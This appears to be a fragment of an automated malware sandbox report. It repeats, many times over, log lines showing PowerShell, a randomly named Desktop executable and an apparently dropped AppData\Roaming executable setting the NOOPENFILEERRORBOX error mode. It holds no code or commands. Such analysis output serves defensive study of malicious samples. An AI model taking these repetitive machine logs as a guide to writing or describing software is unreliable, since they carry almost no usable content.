                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
